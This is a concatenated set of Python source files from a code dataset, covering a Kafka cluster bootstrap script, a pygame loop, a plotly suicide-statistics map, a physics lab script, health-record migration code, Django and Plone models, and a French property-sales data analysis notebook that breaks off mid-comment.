urllib.request.FancyURLopener({})\n opener.retrieve(KAFKA_DOWNLOAD_URL, download_destination);\n else:\n logging.debug(\"Found existing Kafka binaries at: \" + download_destination)\n logging.debug(\"Install Kafka\")\n\n os.chdir(WORKING_DIRECTORY)\n os.system(\"tar -xzf %s\" % filename)\n kafka_home = os.path.join(WORKING_DIRECTORY, os.path.splitext(filename)[0])\n os.environ[\"KAFKA_HOME\"] = kafka_home\n\n end_download = time.time()\n performance_trace_file.write(\"download, %d, %.5f\\n\" % (number_nodes, end_download - start))\n performance_trace_file.flush()\n\n # initialize object for managing kafka clusters\n kafka = KafkaBootstrap(WORKING_DIRECTORY, kafka_home, config_name, options.jobid)\n if options.jobid is not None and options.jobid != \"None\":\n logging.debug(\"Extend Kafka Cluster with PS ID: %s\" % options.jobid)\n kafka.extend()\n end_start = time.time()\n performance_trace_file.write(\"startup-extension, %d, %.5f\\n\" % (number_nodes, (end_start - end_download)))\n performance_trace_file.flush()\n with open(\"kafka_started\", \"w\") as f:\n f.write(str(node_list))\n elif options.start:\n kafka.start()\n number_brokers = 0\n while number_brokers != number_nodes:\n brokers = kafka.check_kafka()\n number_brokers = len(list(brokers.values()))\n logging.debug(\"Number brokers: %d, number nodes: %d\" % (number_brokers, number_nodes))\n time.sleep(1)\n end_start = time.time()\n performance_trace_file.write(\"startup, %d, %.5f\\n\" % (number_nodes, (end_start - end_download)))\n performance_trace_file.flush()\n with open(\"kafka_started\", \"w\") as f:\n f.write(str(node_list))\n else:\n kafka.stop()\n if options.clean:\n directory = \"/tmp/zookeeper/\"\n logging.debug(\"delete: \" + directory)\n shutil.rmtree(directory)\n sys.exit(0)\n\n print(\"Finished launching of Kafka Cluster - Sleeping now\")\n\n while STOP == False:\n logging.debug(\"stop: \" + str(STOP))\n time.sleep(10)\n\n kafka.stop()\n os.remove(os.path.join(WORKING_DIRECTORY, \"kafka_started\"))\n performance_trace_file.write(\"total_runtime, %d, %.5f\\n\" % (number_nodes, time.time() - start))\n performance_trace_file.flush()\n performance_trace_file.close()\n","sub_path":"pilot/plugins/kafka/bootstrap_kafka.py","file_name":"bootstrap_kafka.py","file_ext":"py","file_size_in_byte":18008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"184301952","text":"from SpriteReader import SpriteReader\nfrom MapClasses.CollisionMap import CollisionMap\nfrom MapClasses.BackgroundMap import BackgroundMap\nimport pygame as pyg\nimport init\nfrom InputHandler import InputHandler\nfrom Renderer import Renderer\n\n\ndef main():\n maps = {\n \"collision_map\": CollisionMap(\"src\\maps\\starting_point.txt\"),\n \"background_map\": BackgroundMap()\n }\n screen, scene = init.game()\n running = True\n input_handler = InputHandler(scene, maps)\n sprites = SpriteReader()\n\n renderer = Renderer(screen, scene, maps, sprites)\n while running:\n\n main_loop(input_handler, scene, renderer, maps)\n\n\ndef main_loop(input_handler, scene, renderer, maps):\n\n # This checks for quit and changes scene.player_phsyics\n input_handler.get_events()\n scene.player_physics.update_pos(scene)\n renderer.paint()\n\n\nmain()\n","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"129117667","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[85]:\n\n\nimport cufflinks as cf\nfrom plotly.offline import download_plotlyjs,init_notebook_mode,plot,iplot\nimport pandas as pd\nimport numpy as np\nimport plotly\nimport plotly.plotly as py\nimport plotly.graph_objs as go \n\ninit_notebook_mode(connected=True)\ncf.go_offline()\ndata1 = pd.read_csv(\"master.csv\")\n\nworldMeanSuicides = data1.groupby([\"country\"])[\"suicides_no\"].sum()\ndf1 = pd.DataFrame({\"country\" : worldMeanSuicides.index,\n \"year\" : worldMeanSuicides.values\n })\n\ndef show_values_on_bars(axs):\n def _show_on_single_plot(ax): \n for p in ax.patches:\n _x = p.get_x() + p.get_width() / 2\n _y = p.get_y() + p.get_height()\n value = '{:.2f}'.format(p.get_height())\n ax.text(_x, _y, value, ha=\"center\") \n\n if isinstance(axs, np.ndarray):\n for idx, ax in np.ndenumerate(axs):\n _show_on_single_plot(ax)\n else:\n _show_on_single_plot(axs)\n\ndf = pd.DataFrame({\"year\" : worldMeanSuicides.index,\n \"suicides\" : worldMeanSuicides.values\n })\n\n\ndata = dict(type='choropleth',\n locations = df1[\"country\"],\n locationmode = \"country names\",\n z = df1[\"year\"],\n colorscale = [\n [0, \"rgb(5, 10, 172)\"],\n [0.35, \"rgb(40, 60, 190)\"],\n [0.5, \"rgb(70, 100, 245)\"],\n [0.6, \"rgb(90, 120, 245)\"],\n [0.7, \"rgb(106, 137, 247)\"],\n [1, \"rgb(220, 220, 220)\"]\n ],\n autocolorscale = False,\n reversescale = True,\n colorbar = {\"title\" : \"Number Of Suicides\"},\n marker = go.choropleth.Marker(\n line = go.choropleth.marker.Line(\n color = 'rgb(180,180,180)',\n width = 0.5\n )),\n )\n\nlayout = dict(\n title = 'NUMBER OF SUICIDES PER COUNTRY SINCE 1987-2016',\n geo = dict(\n showframe = False,\n projection = {'type' : \"natural earth\"} )\n)\n\nchoromap = go.Figure(data = [data],layout = layout)\n#iplot(choromap)\nplotly.offline.plot(choromap.iplot())\n\n\n\n\n\n\n\n","sub_path":"Suicides.py","file_name":"Suicides.py","file_ext":"py","file_size_in_byte":2114,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"587908071","text":"from math import *\n\n#standard gravity constant\ngravk = 6.67e-11\n\nmphk = 2236.9362\n\n#fev stands for find escape velosity\ndef fev( mass, dist):\n\tev = sqrt((2 * gravk * mass) / dist)\n\treturn ev\n\nif __name__ == \"__main__\":\n\tnumber_obj = int(input('Input the number of objects to use'))\n\twhile i < number_obj:\n\t\tobj1_m = float(input('Input the mass of object 1 in kg: '))\n\t\tobj1_dkm = float(input('Input the distance from object 1 km: '))\n\t\tobj1_d = obj1_dkm * 1000\n\t\tobj1_ev = fev(obj1_m, obj1_d)/1000\n\n#\t\tobj2_m = float(input('Input the mass of object 2 kg: '))\n#\t\tobj2_dkm = float(input('Input the distance from object 2 km: '))\n#\t\tobj2_d = obj2_dkm * 1000\n#\t\tobj2_ev = fev(obj2_m, obj2_d)/1000\n\n\t\tprint('Escape Velocity of object 1 is ' + str(obj1_ev) + 'KM/s or ' + str(obj1_ev * mphk) + ' MPH')\n#\t\typrint('Escape Velocity of object 2 is ' + str(obj2_ev) + 'KM/s or ' + str(obj2_ev * mphk) + 'MPH')\n","sub_path":"old-cs111/labs/3/excape-vrepeat.py","file_name":"excape-vrepeat.py","file_ext":"py","file_size_in_byte":899,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"148324256","text":"from datetime import date, datetime\n\nfrom dateutil.relativedelta import relativedelta\n\nfrom casexml.apps.case.const import CASE_INDEX_EXTENSION\nfrom casexml.apps.case.mock import CaseStructure, CaseIndex\n\nfrom corehq.apps.locations.models import SQLLocation\nfrom custom.enikshay.private_sector_datamigration.models import (\n Adherence,\n Episode,\n EpisodePrescription,\n LabTest,\n)\n\nfrom dimagi.utils.decorators.memoized import memoized\n\nPERSON_CASE_TYPE = 'person'\nOCCURRENCE_CASE_TYPE = 'occurrence'\nEPISODE_CASE_TYPE = 'episode'\nADHERENCE_CASE_TYPE = 'adherence'\nPRESCRIPTION_CASE_TYPE = 'prescription'\nTEST_CASE_TYPE = 'test'\n\n\ndef get_human_friendly_id():\n return datetime.utcnow().strftime('%Y%m%d%H%M%S%f')[:-3]\n\n\nclass BeneficiaryCaseFactory(object):\n\n def __init__(self, domain, beneficiary):\n self.domain = domain\n self.beneficiary = beneficiary\n\n def get_case_structures_to_create(self):\n person_structure = self.get_person_case_structure()\n ocurrence_structure = self.get_occurrence_case_structure(person_structure)\n episode_structure = self.get_episode_case_structure(ocurrence_structure)\n episode_descendants = [\n self.get_adherence_case_structure(adherence, episode_structure)\n for adherence in self._adherences\n ] + [\n self.get_prescription_case_structure(prescription, episode_structure)\n for prescription in self._prescriptions\n ]\n episode_or_descendants = episode_descendants or [episode_structure]\n\n tests = [\n self.get_test_case_structure(labtest, ocurrence_structure)\n for labtest in self._labtests\n ]\n\n return episode_or_descendants + tests\n\n def get_person_case_structure(self):\n kwargs = {\n 'attrs': {\n 'case_type': PERSON_CASE_TYPE,\n 'close': False,\n 'create': True,\n 'update': {\n 'current_address': self.beneficiary.current_address,\n 'current_episode_type': self.beneficiary.current_episode_type,\n 'dataset': 'real',\n 'first_name': self.beneficiary.firstName,\n 'last_name': self.beneficiary.lastName,\n 'name': ' '.join([self.beneficiary.firstName, self.beneficiary.lastName]),\n 'occupation': '',\n 'phone_number': self.beneficiary.phoneNumber,\n 'secondary_contact_phone_number': self.beneficiary.emergencyContactNo,\n\n 'migration_created_case': 'true',\n 'migration_created_from_record': self.beneficiary.caseId,\n }\n }\n }\n\n if self.beneficiary.age_entered is not None:\n kwargs['attrs']['update']['age'] = self.beneficiary.age_entered\n kwargs['attrs']['update']['age_entered'] = self.beneficiary.age_entered\n else:\n if self.beneficiary.dob is not None:\n kwargs['attrs']['update']['age'] = relativedelta(\n self.beneficiary.creationDate, self.beneficiary.dob\n ).years\n else:\n kwargs['attrs']['update']['age'] = ''\n kwargs['attrs']['update']['age_entered'] = ''\n\n if self.beneficiary.dob is not None:\n kwargs['attrs']['update']['dob'] = self.beneficiary.dob.date()\n kwargs['attrs']['update']['dob_known'] = 'yes'\n else:\n if self.beneficiary.age_entered is not None:\n kwargs['attrs']['update']['dob'] = date(date.today().year - self.beneficiary.age_entered, 7, 1),\n else:\n kwargs['attrs']['update']['dob'] = ''\n kwargs['attrs']['update']['dob_known'] = 'no'\n\n if self.beneficiary.sex is not None:\n kwargs['attrs']['update']['sex'] = self.beneficiary.sex\n\n if self.beneficiary.has_aadhaar_number:\n kwargs['attrs']['update']['aadhaar_number'] = self.beneficiary.identificationNumber\n else:\n kwargs['attrs']['update']['other_id_number'] = self.beneficiary.identificationNumber\n kwargs['attrs']['update']['other_id_type'] = self.beneficiary.other_id_type\n\n if self._episode:\n kwargs['attrs']['update']['hiv_status'] = self._episode.hiv_status\n kwargs['attrs']['update']['current_patient_type_choice'] = self._episode.current_patient_type_choice\n\n agency = (\n self._episode.treating_provider or self.beneficiary.referred_provider\n if self._episode else self.beneficiary.referred_provider\n )\n assert agency is not None\n\n kwargs['attrs']['owner_id'] = SQLLocation.active_objects.get(\n domain=self.domain,\n site_code=agency.nikshayId,\n ).location_id\n\n return CaseStructure(**kwargs)\n\n def get_occurrence_case_structure(self, person_structure):\n kwargs = {\n 'attrs': {\n 'case_type': OCCURRENCE_CASE_TYPE,\n 'close': False,\n 'create': True,\n 'owner_id': '-',\n 'update': {\n 'current_episode_type': self.beneficiary.current_episode_type,\n 'name': 'Occurrence #1',\n 'occurrence_id': get_human_friendly_id(),\n\n 'migration_created_case': 'true',\n 'migration_created_from_record': self.beneficiary.caseId,\n }\n },\n 'indices': [CaseIndex(\n person_structure,\n identifier='host',\n relationship=CASE_INDEX_EXTENSION,\n related_type=PERSON_CASE_TYPE,\n )],\n }\n return CaseStructure(**kwargs)\n\n def get_episode_case_structure(self, occurrence_structure):\n kwargs = {\n 'attrs': {\n 'case_type': EPISODE_CASE_TYPE,\n 'close': False,\n 'create': True,\n 'owner_id': '-',\n 'update': {\n 'adherence_schedule_id': 'schedule_mwf',\n 'date_of_mo_signature': self.beneficiary.dateOfRegn.date(),\n 'dots_99_enabled': 'false',\n 'episode_id': get_human_friendly_id(),\n 'episode_type': self.beneficiary.current_episode_type,\n 'name': self.beneficiary.episode_name,\n 'transfer_in': '',\n\n 'migration_created_case': 'true',\n 'migration_created_from_record': self.beneficiary.caseId,\n }\n },\n 'indices': [CaseIndex(\n occurrence_structure,\n identifier='host',\n relationship=CASE_INDEX_EXTENSION,\n related_type=OCCURRENCE_CASE_TYPE,\n )],\n }\n\n if self._episode:\n rx_start_date = self._episode.rxStartDate.date()\n kwargs['attrs']['date_opened'] = rx_start_date\n kwargs['attrs']['update']['adherence_schedule_date_start'] = rx_start_date\n kwargs['attrs']['update']['date_of_diagnosis'] = self._episode.dateOfDiagnosis.date()\n kwargs['attrs']['update']['disease_classification'] = self._episode.disease_classification\n kwargs['attrs']['update']['episode_pending_registration'] = (\n 'yes' if self._episode.nikshayID is None else 'no'\n )\n kwargs['attrs']['update']['treatment_card_completed_date'] = self._episode.creationDate.date()\n kwargs['attrs']['update']['treatment_initiated'] = 'yes_private'\n kwargs['attrs']['update']['treatment_initiation_date'] = rx_start_date\n kwargs['attrs']['update']['weight'] = int(self._episode.patientWeight)\n\n if self._episode.nikshayID:\n kwargs['attrs']['external_id'] = self._episode.nikshayID\n kwargs['attrs']['update']['nikshay_id'] = self._episode.nikshayID\n\n if self._episode.disease_classification == 'extra_pulmonary':\n kwargs['attrs']['update']['site_choice'] = self._episode.site_choice\n else:\n kwargs['attrs']['update']['episode_pending_registration'] = 'yes'\n kwargs['attrs']['update']['treatment_initiated'] = 'no'\n\n return CaseStructure(**kwargs)\n\n def get_adherence_case_structure(self, adherence, episode_structure):\n kwargs = {\n 'attrs': {\n 'case_type': ADHERENCE_CASE_TYPE,\n 'close': False,\n 'create': True,\n 'owner_id': '-',\n 'update': {\n 'adherence_date': adherence.doseDate.date(),\n 'adherence_value': adherence.adherence_value,\n 'name': adherence.doseDate.date(),\n\n 'migration_created_case': 'true',\n 'migration_created_from_record': adherence.adherenceId,\n }\n },\n 'indices': [CaseIndex(\n episode_structure,\n identifier='host',\n relationship=CASE_INDEX_EXTENSION,\n related_type=EPISODE_CASE_TYPE,\n )],\n }\n return CaseStructure(**kwargs)\n\n def get_prescription_case_structure(self, prescription, episode_structure):\n kwargs = {\n 'attrs': {\n 'case_type': PRESCRIPTION_CASE_TYPE,\n 'close': False,\n 'create': True,\n 'owner_id': '-',\n 'update': {\n 'name': prescription.productName,\n\n 'migration_created_case': 'true',\n 'migration_created_from_record': prescription.prescriptionID,\n }\n },\n 'indices': [CaseIndex(\n episode_structure,\n identifier='host',\n relationship=CASE_INDEX_EXTENSION,\n related_type=EPISODE_CASE_TYPE,\n )],\n }\n return CaseStructure(**kwargs)\n\n def get_test_case_structure(self, labtest, occurrence_structure):\n kwargs = {\n 'attrs': {\n 'case_type': TEST_CASE_TYPE,\n 'close': False,\n 'create': True,\n 'owner_id': '-',\n 'update': {\n 'migration_created_case': 'true',\n }\n },\n 'indices': [CaseIndex(\n occurrence_structure,\n identifier='host',\n relationship=CASE_INDEX_EXTENSION,\n related_type=OCCURRENCE_CASE_TYPE,\n )],\n }\n return CaseStructure(**kwargs)\n\n @property\n @memoized\n def _episode(self):\n episodes = Episode.objects.filter(beneficiaryID=self.beneficiary).order_by('-episodeDisplayID')\n if episodes:\n return episodes[0]\n else:\n return None\n\n @property\n @memoized\n def _adherences(self):\n return list(Adherence.objects.filter(episodeId=self._episode)) if self._episode else []\n\n @property\n @memoized\n def _prescriptions(self):\n return list(EpisodePrescription.objects.filter(beneficiaryId=self.beneficiary))\n\n @property\n @memoized\n def _labtests(self):\n if self._episode:\n return list(LabTest.objects.filter(episodeId=self._episode))\n else:\n return []\n","sub_path":"custom/enikshay/private_sector_datamigration/factory.py","file_name":"factory.py","file_ext":"py","file_size_in_byte":11487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"454211429","text":"from django.db import models\n\n# (후보들의) 정보를 담을수 있는 공간, 장고에서는 모델이라고 한다.\n# Create your models here.\nclass Candidate(models.Model):\n name = models.CharField(max_length=10)\n introduction = models.TextField()\n area = models.CharField(max_length=15)\n party_numbeer = models.IntegerField(default=0) # 기본값은 1부터 시작.\n\n def __str__(self): # 이클래스를 표현할때 어떻게 표현할지에 대한 내용\n return self.name # 이 클래스를 표현할때는 후보자의 이름으로 표현한다. 브라우저를 확인하면 DB에 저장된 이름이 항목에 표시된다.\n\n\nclass Poll2(models.Model):\n start_date = models.DateTimeField() # 조사를 시작하는 시간\n end_date = models.DateTimeField() # 조사를 종료하는 시간\n area = models.CharField(max_length=15) # 지역\n # id는 모델을 만들면 자동으로 생성된다.\n\n\nclass Choice4(models.Model):\n # 다른 클래스를 사용할때 ForeignKey 를 사용한다. 인수로 on_delete 넣어줘야한다.\n poll = models.ForeignKey(Poll2, on_delete=models.CASCADE)\n candidate = models.ForeignKey(Candidate, on_delete=models.CASCADE)\n votes = models.IntegerField(default=0)\n","sub_path":"elections/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"383061901","text":"#-*- coding: UTF-8 -*-\nfrom five import grok\nfrom z3c.form import group, field\nfrom datetime import datetime\n\nfrom persistent.list import PersistentList\nfrom plone.dexterity.interfaces import IDexterityContent\n\nfrom zope.annotation.interfaces import IAnnotations\nfrom zope.lifecycleevent.interfaces import IObjectAddedEvent\nfrom zope.component import getUtility\nfrom zope.component import getMultiAdapter\nfrom Acquisition import aq_parent, aq_base, Implicit\nfrom plone.portlets.interfaces import IPortletManager\nfrom plone.portlets.interfaces import IPortletAssignmentMapping\nfrom zope.container.interfaces import INameChooser\nfrom Products.CMFCore.utils import getToolByName\nfrom Products.CMFPlone.utils import safe_unicode\n\nfrom zope.i18n import translate\nfrom zope.i18nmessageid import Message\nfrom zope.interface import implements\nfrom zope.lifecycleevent.interfaces import IObjectRemovedEvent\nfrom zope.component import adapter\nfrom zope.interface import implementer\n\nfrom emc.kb.contents.topic import Itopic\nfrom emc.kb.contents.question import Iquestion\nfrom emc.kb.contents.topicfolder import Itopicfolder\nfrom emc.kb.interfaces import IFollowedEvent\nfrom emc.kb.interfaces import IUnFollowedEvent\nfrom emc.kb.interfaces import IFollowing,IFollowable\nfrom emc.kb.interfaces import ICountNumEvent\nfrom emc.kb.interfaces import PROMOTIONS_PORTLET_COLUMN \nfrom emc.kb.portlets import relatedinformation\nfrom plone.uuid.interfaces import IUUID\n\n\n\nfrom emc.kb import _\n\nFOLLOWED_KEY = 'emc.kb.follow'\n\n@implementer(IFollowing)\n@adapter(IDexterityContent)\nclass Follow(object):\n# grok.provides(IFollowing)\n# grok.context(Itopic)\n \n def __init__(self, context):\n self.context = context\n \n annotations = IAnnotations(context)\n if FOLLOWED_KEY not in annotations.keys():\n annotations[FOLLOWED_KEY] = PersistentList() \n self.followed = annotations[FOLLOWED_KEY]\n \n #Statistics concern the number of\n @property\n def followerNum(self):\n total = len(self.followed)\n return total\n \n #Determine whether to be concerned about\n def available(self, userToken):\n return not(userToken in self.followed)\n# return self.followed.has_key(userToken) \n #Editing statistics concern the number of \n def addFollow(self, userToken):\n if self.available(userToken):\n self.followed.append(userToken)\n else:\n raise KeyError(\"The %s is concerned about\" % userToken)\n #Editing statistics concern the number of \n def delFollow(self, userToken):\n if not self.available(userToken):\n self.followed.remove(userToken)\n else:\n raise KeyError(\"The %s is not concerned about\" % userToken)\n\n@grok.subscribe(IFollowable,IFollowedEvent)\ndef SubscriberFollowed(obj,event):\n mp = getToolByName(obj,'portal_membership')\n# import pdb\n# pdb.set_trace()\n userobject = mp.getAuthenticatedMember()\n username = userobject.getId()\n fwqlist = list(userobject.getProperty('myfollowquestion'))\n fwtlist = list(userobject.getProperty('myfollowtopic'))\n fwlist = list(userobject.getProperty('myfollow'))\n\n \n uuid = IUUID(obj,None)\n if uuid == None:return\n if not (uuid in fwlist):\n fwlist.append(uuid) \n userobject.setProperties(myfollow=fwlist)\n \n if Iquestion.providedBy(obj) and not(uuid in fwqlist):\n fwqlist.append(uuid) \n userobject.setProperties(myfollowquestion=fwqlist) \n if Itopic.providedBy(obj) and not(uuid in fwtlist):\n fwtlist.append(uuid) \n userobject.setProperties(myfollowtopic=fwtlist) \n \n evlute = IFollowing(obj) \n if evlute.available(username):\n evlute.addFollow(username)\n obj.followernum = evlute.followerNum\n obj.reindexObject() \n \n@grok.subscribe(IFollowable,IUnFollowedEvent)\ndef SubscriberUnFollowed(obj,event):\n mp = getToolByName(obj,'portal_membership')\n userobject = mp.getAuthenticatedMember()\n username = userobject.getId()\n fwqlist = list(userobject.getProperty('myfollowquestion'))\n fwtlist = list(userobject.getProperty('myfollowtopic')) \n fwlist = list(userobject.getProperty('myfollow'))\n\n uuid = IUUID(obj,None)\n if uuid == None:return\n if (uuid in fwlist):\n fwlist.remove(uuid)\n userobject.setProperties(myfollow=fwlist)\n if Iquestion.providedBy(obj) and (uuid in fwqlist):\n fwqlist.remove(uuid) \n userobject.setProperties(myfollowquestion=fwqlist) \n if Itopic.providedBy(obj) and (uuid in fwtlist):\n fwtlist.remove(uuid) \n userobject.setProperties(myfollowtopic=fwtlist) \n \n evlute = IFollowing(obj) \n if not evlute.available(username):\n evlute.delFollow(username)\n obj.followernum = evlute.followerNum\n obj.reindexObject() \n\n@grok.subscribe(IFollowable, IObjectRemovedEvent)\ndef delFollow(obj,event):\n followevlute = IFollowing(obj)\n fwlist = followevlute.followed\n if len(fwlist) == 0:\n return\n \n pm = getToolByName(obj, 'portal_membership')\n for userid in fwlist:\n userobject=pm.getMemberById(userid)\n fwqlist = list(userobject.getProperty('myfollowquestion'))\n fwtlist = list(userobject.getProperty('myfollowtopic')) \n fwlist = list(userobject.getProperty('myfollow'))\n# userfollow = list(userobject.getProperty('myfollow'))\n uuid = IUUID(obj,None)\n if uuid in fwlist:\n fwlist.remove(uuid)\n userobject.setProperties(myfollow=fwlist)\n if uuid in fwtlist:\n fwtlist.remove(uuid)\n userobject.setProperties(myfollowtopic=fwtlist)\n if uuid in fwqlist:\n fwqlist.remove(uuid) \n userobject.setProperties(myfollowquestion=fwqlist) \n\n@grok.subscribe(Itopic,ICountNumEvent)\ndef CountNum(obj,event):\n num=obj.visitnum\n visitnum=num+1\n obj.visitnum=visitnum\n\n@grok.subscribe(Itopic,IObjectAddedEvent)\ndef AddTopicPortlet(obj, event):\n \"\"\" this will add the relatedinformation portlet to topic automatically.\"\"\"\n \n parent = aq_parent(obj)\n if Itopic.providedBy(parent):\n return\n \n # A portlet manager is akin to a column\n column = getUtility(IPortletManager, name=PROMOTIONS_PORTLET_COLUMN)\n \n # We multi-adapt the object and the column to an assignment mapping,\n # which acts like a dict where we can put portlet assignments\n manager = getMultiAdapter((obj, column,), IPortletAssignmentMapping)\n \n # We then create the assignment and put it in the assignment manager,\n # using the default name-chooser to pick a suitable name for us.\n assignment = relatedinformation.Assignment()\n chooser = INameChooser(manager)\n manager[chooser.chooseName(None, assignment)] = assignment\n","sub_path":"emc/kb/behaviors/follow.py","file_name":"follow.py","file_ext":"py","file_size_in_byte":6958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"296617587","text":"# -*- coding: utf-8 -*-\n\n#%% md #\n# Exploratory Data Analysis\n\n# Prix de Vente des Proprietées\n\n\n#%%\nimport pandas as pd\nimport os\nfrom pathlib import Path\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport quickda\n\npd.options.display.max_rows = 999\npd.options.display.max_columns = 999\n\nimport seaborn as sns\n\n\n#import warnings\n#warnings.filterwarnings('ignore')\n\n#%%\n# Set Fix Parame\n \nSEED = 1234 # Seed for random number geneartors\n\n#%% md \n### Load data\n\n\n#%%\n\n\n#ROOT_PATH = os.path.abspath(os.path.dirname(__file__))\ndata_folder = '../../data/raw/'\n\ndsets = {} \n\nfilenames = [ \n #'dvf_2018.gz',\n 'dvf_2019.gz'\n ]\n\n#%% \n # Util Fn to read write out a data sample from origina raw data files\ndef pd_read_save(filename, sample_size, output_path):\n # n = sum(1 for line in open(filename, errors = \"ignore\")) - 1 #number of records in file (excludes header)\n # print(\"total rows\")\n # s = sample_size #desired sample sizfre\n # skip = sorted(np.random.random_integers(1,n+1,n-s)) #the 0-indexed header will not be included in the skip list\n df = pd.read_csv(filename, error_bad_lines = False) #, skiprows=skip\n df_sample = df.sample(sample_size, random_state = SEED)\n df_sample.to_csv(output_path, sep = \";\", index = False)\n print('Writing file of shape: ', df_sample.shape)\n return df\n\n\n\n#%%\n# Read saved data samples\nuse_samples = False\n\nfor f in filenames:\n base_name = f.split('.')[0]\n if not use_samples:\n data_path = data_folder + f\n print(data_folder +'samples/'+f.split('.')[0] +'_sample.csv.gz')\n dsets[base_name] = pd_read_save( data_path, sample_size=400000\n , output_path = data_folder +'samples/'+f.split('.')[0] +'_sample.csv.gz')\n else:\n dsets[base_name] = pd.read_csv( data_folder + 'samples/' + base_name + '_sample.csv.gz'\n , error_bad_lines = False, sep = ';'\n )\n \n\n\ndsets.keys()\n\n\n#%% md \n#### Merge the Data Sets \n\n\n#%%\n# Merge the data sets\n\ndata_in = pd.concat([dsets[d] for d in dsets.keys()])\nprint(data_in.shape) \nprint(data_in.tail(2).T)\n\n# Initial pre Analysis showed that there are many duplicated rows.\ndata_in.drop_duplicates(inplace=True)\nprint(data_in.shape) \n\n# =============================================================================\n#%% md \n#### Explore Data \n\n#%%\n\ndata_in.info()\n\n#%%\n# Get Proportion of Null values on Columns\n\n#nulls_df = pd.DataFrame( {'Nulls': data_in.isnull().sum().values\n# , 'Ptj':data_in.isnull().sum() / data_in.shape[0]\n# }\n# )\n#print(nulls_df)\n\n\n# =============================================================================\n#%% md \n### Data Summary\n#Summary of the Row Data Set \n\n#%%\nfrom quickda.explore_data import *\nfrom quickda.clean_data import *\nfrom quickda.explore_numeric import *\nfrom quickda.explore_categoric import *\nfrom quickda.explore_numeric_categoric import *\nfrom quickda.explore_time_series import *\n\n\nsummary = explore(data_in, method=\"summarize\")\n#%%\n\nsummary # Display Raw Data Summary\n\n#summary\n\n#%% md \n### Assign Features on Categories\n\n\n#%%\n#%md Useful FtrsDrop Reason: They can not have missing values\n#valeur_fonciere (target cant have nulls)\n\n\n#%md High null pct ftrs\n\n#adresse_suffixe 0.958\n#ancien_code_commune 0.991\n#ancien_id_parcelle 0.999\n#ancien_nom_commune 0.991\n#code_nature_culture_speciale 0.954\n#code_type_local 0.476\n#lot1_numero 0.687\n#lot1_surface_carrez 0.912\n#lot2_numero 0.935\n#lot2_surface_carrez 0.979\n#lot3_numero 0.989\n#lot3_surface_carrez 0.998\n#lot4_numero 0.996\n#lot4_surface_carrez 0.999\n#lot5_numero 0.998\n#lot5_surface_carrez 1.000\n#nature_culture_speciale 0.954\n#numero_volume 0.997\n\n\n#%md Useful FtrsRedundant Features\n# dtypes count null_sum null_pct nunique\n#ancien_code_commune float64 7004 778519 0.991 532 \n#code_commune object 785523 0 0.000 31251 \n#code_departement object 785523 0 0.000 97 \n#code_nature_culture object 535959 249564 0.318 27 \n#code_nature_culture_speciale object 35761 749762 0.954 113 \n#code_type_local float64 411728 373795 0.476 4 \n\n\n#%md Useful Ftrs\n#surface_reelle_bati 118074 0.590370 NaN 0\n#nombre_pieces_principales 93279 0.466395 NaN 0\n#nature_culture 62293 0.311465 NaN \"N/A\"\n#code_type_local NAN \"N/A\"\n#longitude 4048 0.020240 k-neighb estim\n#latitude 4048 0.020240 k-neighb estim\n\n\n\n\n#%% md \n### Setting Unuseful featues for analysis Using above summary results\n\n\n\n#%% # Assigning Features to differet categorie types\n\nunuseful_ftrs = ['id_mutation', 'adresse_nom_voie', 'adresse_numero']\n\nuseful_high_ptc_ftrs = [ 'adresse_numero'\n , 'nombre_pieces_principales'\n , 'type_local'\n , 'surface_reelle_bati' \n , 'type_local'\n ]\n\n#Un inputable high nulls ftrs\nftrs_high_null_ptc = [f for f in summary.loc[summary.null_pct > 0.40,:].index if f not in useful_high_ptc_ftrs]\n#summary.loc[ftrs_high_null_ptc, 'null_pct']\n\nuseful_code_ftrs = [\n 'code_commune'\n , 'code_postal'\n ]\n\nredundant_ftrs = [c for c in summary.index if 'code' in c and c not in useful_code_ftrs]\nredundant_ftrs\n\n\nunuseful_ftrs += sorted(list(set(ftrs_high_null_ptc).union(set(redundant_ftrs))))\nunuseful_ftrs\n\n\nftrs = list(sorted([f for f in data_in.columns if f not in unuseful_ftrs])) \n\n\n\n#%%\n# Inspect left useful ftrs\nsmmry4 = ['dtypes', 'count', 'null_pct', 'nunique']\nsummary.loc[ftrs, smmry4]\n\n\n\n\n\n#%% md \n### Set useful Feature Groups\n\n\n#%%\n# Set useful Feature Groups\n\nftrs = list(sorted([f for f in data_in.columns if f not in unuseful_ftrs]))\ntarget = 'valeur_fonciere'\nftrs.remove(target)\n\nnum_ftrs = list(summary.loc[summary.index.isin(ftrs) & (summary['dtypes'] != 'object'),:].index)\nnum_ftrs = [f for f in num_ftrs if f not in ['code_postal']] # Remove wrogly assigned num ftrs and target\ndata_in.loc[:,'code_postal'] = data_in.loc[:,'code_postal'].astype('str')\n\nsummary.loc[num_ftrs,smmry4]\n\ndate_ftrs = ['date_mutation']\n\ncat_ftrs = list(summary.loc[summary.index.isin(ftrs)\n & (summary['dtypes'] == 'object')\n & (summary['nunique'] > 2 )\n ,:].index\n )\ncat_ftrs.append('code_postal')\nbool_ftrs = []\n\n# Assert all columns have bee assigned to a ftr class\nall_solumns_assigned = len(set(data_in.columns).symmetric_difference(\n set(unuseful_ftrs + num_ftrs + cat_ftrs + date_ftrs + bool_ftrs + [target])))==0\nassert(all_solumns_assigned)\n\n\ndata_in2 = data_in.loc[:, [target] + ftrs ]\n\n\nfor dt in [date_ftrs, num_ftrs, cat_ftrs]:\n print(summary.loc[dt, smmry4])\n\ndata_in2.tail(1).T\n\n\n#%% md \n##### Check Duplicates\n\n\n\n#%% md #\n#It seems like duplicates are sales with id_parcelle ad num disposition\n#and valeur_fonciere when they are same more than once \n\n\n#%%\n# Explore number of duplicated id 